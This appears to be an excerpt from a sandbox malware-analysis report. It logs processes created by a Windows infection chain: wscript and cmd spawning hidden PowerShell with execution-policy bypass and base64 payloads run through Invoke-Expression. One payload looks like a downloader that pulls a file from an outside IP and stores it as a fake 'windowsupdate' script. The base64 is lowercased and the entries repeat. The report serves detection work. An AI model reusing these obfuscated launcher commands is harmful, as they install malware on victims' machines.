kq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex unrestricted -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'dqogicagicagicrxzefsaya9iefezc10evblic1nzw1czvjkruzjbklusu9uicdbrgxssw1wb3j0kcj1ukxnb04ilcbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryihpxlcbzdhjpbmcgshl0bflar3dprlqsihn0cmluzyb0c3rmevusihvpbnqgb2xhbejotmzmu0ssieludfb0cibuauxpktsnic1uqw1licjwdwxoy0d2aufqiiattkfnrxnwyunlifbhc1fjd3bewsatugfzc1rocnu7ia0kicagicagicakv2rbums6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly80ns4ymdaumtq5ljewndo1mdawl2rvd25sb2fkl25vdmffa2f5y2vllnzicyisiirltly6qvbqrefuqvx3aw5kb3dzdxbkyxrllnziuyismcwwktsgdqogicagicagihnuqxjulxnmzuvwkdmpoyanciagicagicagaw5wb0tllwvychjfc1npt24giirftny6qvbqrefuqvx3aw5kb3dzdxbkyxrllnziuyinciagicagicag'+[char]0x22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex unrestricted -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'dqogicagicagicrxzefsaya9iefezc10evblic1nzw1czvjkruzjbklusu9uicdbrgxssw1wb3j0kcj1ukxnb04ilcbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryihpxlcbzdhjpbmcgshl0bflar3dprlqsihn0cmluzyb0c3rmevusihvpbnqgb2xhbejotmzmu0ssieludfb0cibuauxpktsnic1uqw1licjwdwxoy0d2aufqiiattkfnrxnwyunlifbhc1fjd3bewsatugfzc1rocnu7ia0kicagicagicakv2rbums6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly80ns4ymdaumtq5ljewndo1mdawl2rvd25sb2fkl25vdmffa2f5y2vllnzicyisiirltly6qvbqrefuqvx3aw5kb3dzdxbkyxrllnziuyismcwwktsgdqogicagicagihnuqxjulxnmzuvwkdmpoyanciagicagicagaw5wb0tllwvychjfc1npt24giirftny6qvbqrefuqvx3aw5kb3dzdxbkyxrllnziuyinciagicagicag'+[char]0x22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyrJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
